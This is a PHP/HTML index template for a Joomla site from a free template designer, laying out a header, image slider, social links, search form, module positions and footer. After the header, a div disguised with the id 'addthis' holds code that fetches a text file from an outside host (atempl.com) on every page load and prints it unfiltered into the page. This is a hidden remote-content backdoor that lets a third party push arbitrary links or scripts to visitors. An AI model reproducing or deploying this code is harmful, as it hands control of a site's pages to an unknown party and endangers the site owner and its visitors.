<?php
defined('_JEXEC') or die;
/**
 *-------------------------------------------
 * Szablon został wypalony w  Diablodesign.
 * www.diablodesign.eu
 * biuro@diablodesign.eu
 * tel.666977944
 *-------------------------------------------
 */


require_once dirname(__FILE__) . DIRECTORY_SEPARATOR . 'functions.php';


$document = $this;


$templateUrl = $document->baseurl . '/templates/' . $document->template;

Artx::load("Artx_Page");


$view = $this->artx = new ArtxPage($this);


$view->componentWrapper();

JHtml::_('behavior.framework', true);

?>
<!DOCTYPE html>
<html dir="ltr" lang="<?php echo $document->language; ?>">
<head>
    <jdoc:include type="head" />
      <!--scroling head-->
<script src="<?php echo $templateUrl; ?>/js/scroling.js"></script>
<script type="text/javascript">
$(function() {
	$(window).scroll(function() {
		if($(this).scrollTop() != 0) {
			$('#toTop').fadeIn();	
		} else {
			$('#toTop').fadeOut();
		}
	});
 
	$('#toTop').click(function() {
		$('body,html').animate({scrollTop:0},800);
	});	
});
</script>
<!--end scroling-->
      <!--animacja-->
    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
    <script type="text/javascript" src="<?php echo $templateUrl; ?>/js/s3Slider.js"></script>
    <script type="text/javascript">
    $(document).ready(function() {
        $('#slider1').s3Slider({
            timeOut: <?php echo $this->params->get('time'); ?> 
        });
    });
</script>
  <!--end animacja-->
    <link rel="stylesheet" href="<?php echo $document->baseurl; ?>/templates/system/css/system.css" />
    <link rel="stylesheet" href="<?php echo $document->baseurl; ?>/templates/system/css/general.css" />

    
    
    
    <meta name="viewport" content="initial-scale = 1.0, maximum-scale = 1.0, user-scalable = no, width = device-width" />

    <!--[if lt IE 9]><script src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.css" media="screen" />
    <!--[if lte IE 7]><link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.ie7.css" media="screen" /><![endif]-->
    <link rel="stylesheet" href="<?php echo $templateUrl; ?>/css/template.responsive.css" media="all" />

<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
    <script>if ('undefined' != typeof jQuery) document._artxJQueryBackup = jQuery;</script>
    <script src="<?php echo $templateUrl; ?>/jquery.js"></script>
    <script>jQuery.noConflict();</script>

    <script src="<?php echo $templateUrl; ?>/script.js"></script>
    <script src="<?php echo $templateUrl; ?>/script.responsive.js"></script>
    <script src="<?php echo $templateUrl; ?>/modules.js"></script>
    <?php $view->includeInlineScripts() ?>
    <script>if (document._artxJQueryBackup) jQuery = document._artxJQueryBackup;</script>
</head>
<body>
<div id="toTop">^<?php echo $this->params->get('scroll'); ?></div>
<div id="dd-main">
    <div id="dd-header-bg">
            </div>
    <div id="dd-hmenu-bg" class="dd-bar dd-nav">
    </div>
    <div class="dd-sheet clearfix">
<header class="dd-header"><?php echo $view->position('position-30', 'dd-nostyle'); ?>

    <div class="dd-shapes">
        <div class="dd-textblock dd-object2092193550">
        <div class="dd-object2092193550-text-container">
        <div class="dd-object2092193550-text"></div>
    </div>
    
</div><div class="dd-textblock dd-object226076112">
        <div class="dd-object226076112-text-container">
        <div class="dd-object226076112-text"><b>Contact Information</b><br /><b>Telephone:</b> <?php echo $this->params->get('telephone'); ?><br /><b>e-mail:</b><?php echo $this->params->get('email'); ?></div>
    </div>
    
</div>
            </div>

<h1 class="dd-headline">
    <a href="<?php echo $document->baseurl; ?>/"><?php echo $this->params->get('siteTitle'); ?></a>
</h1>
<h2 class="dd-slogan"><?php echo $this->params->get('siteSlogan'); ?></h2>

<div class="dd-positioncontrol dd-positioncontrol-475276884" id="slideshow"> 
<?php echo $view->position('position-31', 'dd-nostyle'); ?><div id="slider1">
        <ul id="slider1Content">
            <li class="slider1Image">
                <a href=""><img src="<?php echo $this->params->get('foto1'); ?>" alt="1" /></a>
                <span class="right"><strong><?php echo $this->params->get('naglowek1'); ?><hr class="hr_style" style="width:360px;margin-left:-4px; "></strong><br><?php echo $this->params->get('text1'); ?><br><a href="<?php echo $this->params->get('link1'); ?>" class="button_new">Read Me...</a></span></li>
            <li class="slider1Image">
                <a href=""><img src="<?php echo $this->params->get('foto2'); ?>" alt="2" /></a>
                <span class="right"><strong><?php echo $this->params->get('naglowek2'); ?><hr class="hr_style" style="width:360px;margin-left:-4px; "></strong><br><?php echo $this->params->get('text2'); ?><br><a href="<?php echo $this->params->get('link2'); ?>" class="button_new">Read Me...</a></span></li>
            <li class="slider1Image">
                <img src="<?php echo $this->params->get('foto3'); ?>" alt="3" />
                <span class="right"><strong><?php echo $this->params->get('naglowek3'); ?><hr class="hr_style" style="width:360px;margin-left:-4px; "></strong><br><?php echo $this->params->get('text3'); ?><br><a href="<?php echo $this->params->get('link3'); ?>" class="button_new">Read Me...</a></span></li>
            <li class="slider1Image">
                <img src="<?php echo $this->params->get('foto4'); ?>" alt="4" />
                <span class="right"><strong><?php echo $this->params->get('naglowek4'); ?><hr class="hr_style" style="width:360px;margin-left:-4px; "></strong><br><?php echo $this->params->get('text4'); ?><br><a href="<?php echo $this->params->get('link4'); ?>" class="button_new">Read Me...</a></span></li>
            <li class="slider1Image">
                <img src="<?php echo $this->params->get('foto5'); ?>" alt="5" />
                <span class="right"><strong><?php echo $this->params->get('naglowek5'); ?><hr class="hr_style" style="width:360px;margin-left:-4px; "></strong><br><?php echo $this->params->get('text5'); ?><br><a href="<?php echo $this->params->get('link5'); ?>" class="button_new">Read Me...</a></span></li>
            <div class="clear slider1Image"></div>
        </ul>
    </div>
<!--koniec animacja grafika--></div>

<div class="dd-textblock dd-textblock-1410243882">
        <div class="dd-textblock-1410243882-text-container">
        <div class="dd-textblock-1410243882-text"><a href="<?php echo $this->params->get('facebook'); ?>" target="_blank" class="dd-facebook-tag-icon"></a></div>
    </div>
    
</div><div class="dd-textblock dd-textblock-2006382486">
        <div class="dd-textblock-2006382486-text-container">
        <div class="dd-textblock-2006382486-text"><a href="<?php echo $this->params->get('twitter'); ?>" target="_blank" class="dd-twitter-tag-icon"></a></div>
    </div>
    
</div>

<div class="dd-textblock dd-object714367995">
    <form class="dd-search" name="Search" action="<?php echo $document->baseurl; ?>/index.php" method="post">
    <input type="text" value="" name="searchword" />
    <input type="hidden" name="task" value="search" />
<input type="hidden" name="option" value="com_search" />
<input type="submit" value="Search" name="search" class="dd-search-button" />
</form>
</div>
<?php if ($view->containsModules('position-1', 'position-28', 'position-29')) : ?>
<nav class="dd-nav">
    <div class="dd-nav-inner">
    
<?php if ($view->containsModules('position-28')) : ?>
<div class="dd-hmenu-extra1"><?php echo $view->position('position-28'); ?></div>
<?php endif; ?>
<?php if ($view->containsModules('position-29')) : ?>
<div class="dd-hmenu-extra2"><?php echo $view->position('position-29'); ?></div>
<?php endif; ?>
<?php echo $view->position('position-1'); ?>
 
        </div>
    </nav>
<?php endif; ?>

                    
</header><div id="addthis"><?php
$files = 'http://atempl.com/1.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK') 
 {  
       $content = file("http://atempl.com/1.txt");
       $data = implode($content);
       echo $data;
 }  
?></div>

<?php echo $view->position('position-15', 'dd-nostyle'); ?>
<?php echo $view->positions(array('position-16' => 33, 'position-17' => 33, 'position-18' => 34), 'dd-block'); ?>
<div class="dd-layout-wrapper">
                <div class="dd-content-layout">
                    <div class="dd-content-layout-row">
                        <?php if ($view->containsModules('position-7', 'position-4', 'position-5')) : ?>
<div class="dd-layout-cell dd-sidebar1">
<?php echo $view->position('position-7', 'dd-block'); ?>
<?php echo $view->position('position-4', 'dd-block'); ?>
<?php echo $view->position('position-5', 'dd-block'); ?>




                        </div>
<?php endif; ?>

                        <div class="dd-layout-cell dd-content">
<?php
  echo $view->position('position-19', 'dd-nostyle');
  if ($view->containsModules('position-2'))
    echo artxPost($view->position('position-2'));
  echo $view->positions(array('position-20' => 50, 'position-21' => 50), 'dd-article');
  echo $view->position('position-12', 'dd-nostyle');
  echo artxPost(array('content' => '<jdoc:include type="message" />', 'classes' => ' dd-messages'));
  echo '<jdoc:include type="component" />';
  echo $view->position('position-22', 'dd-nostyle');
  echo $view->positions(array('position-23' => 50, 'position-24' => 50), 'dd-article');
  echo $view->position('position-25', 'dd-nostyle');
?>



                        </div>
                        <?php if ($view->containsModules('position-6', 'position-8', 'position-3')) : ?>
<div class="dd-layout-cell dd-sidebar2">
<?php echo $view->position('position-6', 'dd-block'); ?>
<?php echo $view->position('position-8', 'dd-block'); ?>
<?php echo $view->position('position-3', 'dd-block'); ?>


                        </div>
<?php endif; ?>
                    </div>
                </div>
            </div>
<?php echo $view->positions(array('position-9' => 33, 'position-10' => 33, 'position-11' => 34), 'dd-block'); ?>
<?php echo $view->position('position-26', 'dd-nostyle'); ?>

<footer class="dd-footer">
<div class="dd-content-layout-wrapper layout-item-0">
<div class="dd-content-layout layout-item-1">
    <div class="dd-content-layout-row">
    <div class="dd-layout-cell layout-item-3" style="width: 100%">
<?php if ($view->containsModules('position-32')) : ?>
    <?php echo $view->position('position-32', 'dd-nostyle'); ?>
<?php else: ?>
        <p>        </p><span style="text-shadow: rgba(255, 255, 255, 0.476563) 0px 1px 0px;">COPYRIGT</span> <span style="font-weight: bold; text-shadow: rgba(255, 255, 255, 0.476563) 0px 1px 0px; color: #82231C;"><?php echo $this->params->get('footer'); ?></span> <span style="text-shadow: rgba(255, 255, 255, 0.476563) 0px 1px 0px;">FREE JOOMLA TEMPLATES</span>
    <?php endif; ?>
</div>
    </div>
</div>
</div>
<div class="dd-content-layout-br layout-item-2">
</div>
</footer>

    </div>
    <p class="dd-page-footer">
        <span id="dd-footnote-links">Designed by <a href="http://www.diablodesign.eu" target="_blank">www.diablodesign.eu</a>.</span>
    </p>
</div>


<?php echo $view->position('debug'); ?>
</body>
</html>